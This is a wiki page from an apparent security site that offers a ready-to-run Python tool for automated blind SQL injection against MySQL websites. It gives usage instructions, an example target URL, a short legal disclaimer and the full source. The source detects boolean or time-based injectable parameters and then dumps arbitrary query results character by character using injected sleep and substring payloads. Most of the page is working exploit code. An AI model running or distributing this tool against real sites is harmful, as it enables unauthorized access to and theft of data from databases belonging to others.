Questions about this topic? Sign up to ask in the talk tab.
SQL injection/mysqli-blindutils/sqli-slee.py
From NetSec
Revision as of 17:00, 22 September 2012 by MinnaMichalik (Talk | contribs)
|
Contents
Info
The syntax of this script is:
python bsqli.py -u [url] -i [injection]
Example
python bsqli.py -u "http://target.com/?id=1%27" -i "select database()"
Disclaimer
|
The end-user is liable for his-or her own actions with the use of this software. Running this against a system you do not own without written authorization is a criminal act. |
Source
#!/usr/bin/python import sys,re,urllib,urllib2,string,time from optparse import OptionParser from urllib2 import Request,urlopen,URLError,HTTPError def request(URL): useragent = { 'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10' } req = urllib2.Request(URL, None, useragent) try: request=urllib2.urlopen(req) except HTTPError, e: print('[!] The server couldnt fulfill the request.') print('[!] Error code: '+str(e.code)) sys.exit(1) except URLError, e: print('[!] We failed to reach a server.') print('[!] Reason: '+str(e.reason)) sys.exit(1) return len(request.read()) def value(URL): target=0 end=0 nextmaybe=0 floor=0 ceiling=255 maybe = int(ceiling)/2 while(end!=9): if iswhat(URL, maybe, '>'): floor = maybe nextmaybe = int(maybe + ((ceiling - floor)/2)) elif iswhat(URL, maybe, '<'): ceiling = maybe nextmaybe = int(maybe - ((ceiling - floor)/2)) elif iswhat(URL, maybe, '='): return chr(maybe) maybe = nextmaybe end+=1 return 'done' def iswhat(URL,maybe,op): if(sqlitype=='boolean'): ValueResponse=int(request(str(URL)+str(op)+str(maybe)+'--+')) if(TrueResponse==ValueResponse): return 1 else: return 0 elif(sqlitype=='time'): start = time.time() ValueResonse=request(str(URL)+str(op)+str(maybe)+')*2)--+') elapsedtime = (time.time() - start) if (elapsedtime > 2): return 1 else: return 0 def vulncheck(URL): print('[+] Checking site...') global TrueResponse TrueResponse=int(request(URL+'%20AND%2043%20like%2043--+')) FalseResponse=int(request(URL+'%20AND%2034%20like%2043--+')) if(TrueResponse!=FalseResponse): print('[+] Site seems to be vulnerable to boolean based blind SQL injection.') return 'boolean' else: start = time.time() SleepResponse=request(URL+'%20and%20sleep(5)--+') elapsedtime = (time.time() - start) if (elapsedtime > 5): print('[+] Site seems to be vulnerable to time based blind SQL injection.') return 'time' else: print('[!] Seems like site isnt vulnerable to blind SQL injection.') sys.exit(1) def main(): print(''' Auto BSQLi tool for MySQL ''') usage = 'usage: %prog -u <target> -i <injection>' parser = OptionParser(usage=usage) parser.add_option("-u", action="store", type="string", dest="URL", help='"http://site.tld/index.php?id=1%27"') parser.add_option('-i', action='store', type='string', dest='INJECTION', help='"select version()"') (options, args) = parser.parse_args() if options.URL and options.INJECTION: URL=options.URL INJECTION=urllib2.quote(options.INJECTION.encode("utf8")) else: print('[!] Missing url or injection parameter.') print('[!] Use --help.') sys.exit(1) global sqlitype sqlitype=vulncheck(URL) position=1 dump='' print('[+] Dumping data...') while(1): if(sqlitype=='boolean'): letter=value(URL+'%20and%20ascii(substr(('+INJECTION+')%20from%20'+str(position)+'%20for%201))') elif(sqlitype=='time'): letter=value(URL+'%20and%20sleep((select%20ascii(substr(('+INJECTION+')%20from%20'+str(position)+'%20for%201))') if(letter=='done'): break dump=dump+letter position+=1 if(dump): print('[+] Data: '+dump) else: print('[!] No data dumped. Check your injection.') if __name__ == "__main__": main() |
